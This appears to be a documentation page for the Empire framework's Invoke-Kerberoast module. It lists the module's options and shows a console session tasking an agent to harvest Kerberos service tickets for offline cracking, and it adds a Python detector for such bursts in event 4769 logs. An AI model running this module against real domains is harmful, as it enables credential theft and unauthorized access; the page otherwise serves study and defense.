Invoke-Kerberoast - Empire Module


This page contains detailed information about how to use the powershell/credentials/invoke_kerberoast Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Kerberoast
Module: powershell/credentials/invoke_kerberoast
Source code [1]: empire/server/modules/powershell/credentials/invoke_kerberoast.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1
MITRE ATT&CK: T1208
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

The invoke_kerberoast module requests Kerberos service tickets for all users with a non-null service principal name (SPN) and extracts them into a format ready for John the Ripper or Hashcat.

According to the module metadata above, this module runs in the background and is marked OPSEC safe; the service-ticket requests it issues are nevertheless visible to domain controller logging and to AV/EDR running on the target system, so it can still be detected.

Note that the invoke_kerberoast module does not need administrative privileges to work properly, which means that a normal (non-privileged) domain user can run this module.
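Because the module requests a ticket for every SPN-bearing account, the corresponding defender-side signal is one account requesting service tickets for many distinct services in a short window, typically with the RC4 encryption type (0x17), in Windows Security event 4769. The following is an added example, not code from the Empire project or this page; the event tuples are constructed sample data and the window and threshold values are assumed tuning knobs.

```python
# Added example: flag Kerberoasting-like bursts in Windows Security event 4769
# (Kerberos service ticket requested). Not part of Empire or its docs.
from collections import defaultdict
from datetime import datetime

# Constructed sample 4769 events, reduced to the fields the rule needs:
# (timestamp, TargetUserName = requesting account, ServiceName, TicketEncryptionType)
SAMPLE_4769 = [
    ("2024-05-01T10:00:01", "alice@TESTLAB.LOCAL", "sql01$", "0x12"),
    ("2024-05-01T10:00:02", "alice@TESTLAB.LOCAL", "web01$", "0x12"),
    ("2024-05-01T10:05:10", "bob@TESTLAB.LOCAL", "svc_sql", "0x17"),
    ("2024-05-01T10:05:11", "bob@TESTLAB.LOCAL", "svc_web", "0x17"),
    ("2024-05-01T10:05:11", "bob@TESTLAB.LOCAL", "svc_backup", "0x17"),
    ("2024-05-01T10:05:12", "bob@TESTLAB.LOCAL", "svc_exchange", "0x17"),
    ("2024-05-01T10:05:13", "bob@TESTLAB.LOCAL", "svc_ftp", "0x17"),
    ("2024-05-01T10:05:14", "bob@TESTLAB.LOCAL", "svc_print", "0x17"),
    ("2024-05-01T10:40:00", "carol@TESTLAB.LOCAL", "svc_sql", "0x17"),
]

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC tickets


def find_kerberoast_candidates(events, window_seconds=60, min_services=5):
    """Return {requester: set(services)} for accounts that requested RC4 service
    tickets for at least `min_services` distinct services inside any
    `window_seconds` window. Tickets for computer accounts ($-suffixed service
    names) are ignored because they are routine traffic, not roastable SPNs."""
    per_user = defaultdict(list)
    for ts, requester, service, etype in events:
        if etype != RC4_HMAC or service.endswith("$"):
            continue
        per_user[requester].append((datetime.fromisoformat(ts), service))
    hits = {}
    for requester, reqs in per_user.items():
        reqs.sort()  # sliding window over time-ordered requests
        start = 0
        for end in range(len(reqs)):
            while (reqs[end][0] - reqs[start][0]).total_seconds() > window_seconds:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                hits[requester] = services  # keeps the largest window seen
    return hits


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"{user}: {len(services)} RC4 service tickets -> {sorted(services)}")
```

The threshold and window should be tuned per environment; a domain that has already moved its service accounts to AES-only keys will see the burst with encryption type 0x12 instead, so the etype filter is a tuning choice, not a hard rule.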

Required Module Options


This is a list of options that are required by the invoke_kerberoast module:

Agent
Agent to run module on.

Additional Module Options


This is a list of additional options that are supported by the invoke_kerberoast module:

AdminCount
Kerberoast privileged accounts protected by AdminSDHolder.

Domain
Specifies the domain to use for the query, defaults to the current domain.

Identity
Specific SamAccountName, DistinguishedName, SID, or GUID to kerberoast.

LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.

OutputFormat
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Default value: John.

OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.

SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local".

SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

Server
Specifies an Active Directory server (domain controller) to bind to.

Invoke_kerberoast Example Usage


Here's an example of how to use the invoke_kerberoast module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/invoke_kerberoast

 Author       @harmj0y                                                               
              @machosec                                                              
 Background   True                                                                   
 Comments     https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/         
              https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9       
 Description  Requests kerberos tickets for all users with a non-null service        
              principal name (SPN) and extracts them into a format ready for John or 
              Hashcat.                                                               
 Language     powershell                                                             
 Name         powershell/credentials/invoke_kerberoast                               
 NeedsAdmin   False                                                                  
 OpsecSafe    True                                                                   
 Techniques   http://attack.mitre.org/techniques/T1208                               


,Record Options--,------------,----------,-------------------------------------,
| Name           | Value      | Required | Description                         |
|----------------|------------|----------|-------------------------------------|
| AdminCount     |            | False    | Kerberoast privileged accounts      |
|                |            |          | protected by AdminSDHolder.         |
|----------------|------------|----------|-------------------------------------|
| Agent          |            | True     | Agent to run module on.             |
|----------------|------------|----------|-------------------------------------|
| Domain         |            | False    | Specifies the domain to use for the |
|                |            |          | query, defaults to the current      |
|                |            |          | domain.                             |
|----------------|------------|----------|-------------------------------------|
| Identity       |            | False    | Specific SamAccountName,            |
|                |            |          | DistinguishedName, SID, or GUID to  |
|                |            |          | kerberoast.                         |
|----------------|------------|----------|-------------------------------------|
| LDAPFilter     |            | False    | Specifies an LDAP query string that |
|                |            |          | is used to filter Active Directory  |
|                |            |          | objects.                            |
|----------------|------------|----------|-------------------------------------|
| OutputFormat   | John       | False    | Either 'John' for John the Ripper   |
|                |            |          | style hash formatting, or 'Hashcat' |
|                |            |          | for Hashcat format.                 |
|----------------|------------|----------|-------------------------------------|
| OutputFunction | Out-String | False    | PowerShell's output function to use |
|                |            |          | ("Out-String", "ConvertTo-Json",    |
|                |            |          | "ConvertTo-Csv", "ConvertTo-Html",  |
|                |            |          | "ConvertTo-Xml").                   |
|----------------|------------|----------|-------------------------------------|
| SearchBase     |            | False    | The LDAP source to search through,  |
|                |            |          | e.g. "LDAP://OU=secret,DC=testlab,D |
|                |            |          | C=local".                           |
|----------------|------------|----------|-------------------------------------|
| SearchScope    |            | False    | Specifies the scope to search       |
|                |            |          | under, Base/OneLevel/Subtree        |
|                |            |          | (default of Subtree).               |
|----------------|------------|----------|-------------------------------------|
| Server         |            | False    | Specifies an Active Directory       |
|                |            |          | server (domain controller) to bind  |
|                |            |          | to.                                 |
'----------------'------------'----------'-------------------------------------'

(Empire: usemodule/powershell/credentials/invoke_kerberoast) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/invoke_kerberoast) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come back from the agent.

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.